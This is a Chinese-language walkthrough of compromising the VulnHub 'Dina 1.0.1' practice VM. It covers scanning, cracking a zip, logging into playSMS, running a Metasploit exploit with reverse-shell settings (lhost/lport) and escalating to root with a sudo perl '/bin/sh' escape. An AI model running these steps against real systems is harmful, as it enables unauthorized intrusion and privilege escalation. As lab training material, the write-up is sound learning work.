vulnhub-Dina 1.0.1靶机

vulnhub:https://www.vulnhub.com/entry/dina-101,200/

这个靶机不知道为什么下载速度很慢几乎没有进度,但是我用迅雷就能正常下载,建议下不下来的也找个下载器试试

下载下来后导入靶机,和kali同一网段,根据靶机表述,目标是root目录下的flag文件,先扫描靶机IP

image-20240922141121467

扫描到IP地址为192.168.114.129,使用nmap扫描端口

image-20240922141149631

只扫到了80端口和网页服务,常规思路访问

image-20240922141215148

点击网页的按钮,发现跳转到了一个ange1目录下,但是目录里什么都没有

image-20240922141228930

扫描网站的目录

image-20240922141407858

通过目录扫描找到了几个目录,先看robots.txt

image-20240922141438647

又指出了两个我们没找到的目录

secure目录下有个backup.zip

image-20240922142537003

nothing目录下则有个类似密码字典的注释

image-20240922142708343

别的页面就没东西了

之前那个backup.zip发现里面是一个mp3文件,解压需要密码

image-20240922142801707

尝试刚才获得的密码,发现是freedom

检查发现这个mp3实际上是文本文件,查看发现一个url路径/SecreTSMSgatwayLogin和用户touhid

image-20240922142933755

访问url,是个登录界面

image-20240922143056044

使用touhid和diana即可登录

image-20240922143147666

在网站里没找到什么有用的功能点,尝试在MSF找一下CMS的漏洞

search playsms

image-20240922143802635

这里搜出来三个漏洞,使用0号

image-20240922143945742

填写脚本的设置

set rhost 192.168.114.129(靶机IP)

set lhost 192.168.114.128(kaliIP)

set lport 4444

set username touhid

set password diana

set targeturi /SecreTSMSgatwayLogin

image-20240922144638726

设置完成后运行脚本成功获得了一个meterpreter会话

image-20240922144735211

开启shell,并且生成交互式界面

shell

python -c 'import pty; pty.spawn("/bin/sh")'

image-20240922144842074

首先我们查询无密码的sudo命令

image-20240922144923889

利用

sudo /usr/bin/perl -e "exec '/bin/sh'"

image-20240922145017471

至此完成提权,剩下的就是去root目录拿flag

image-20240922145056301

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值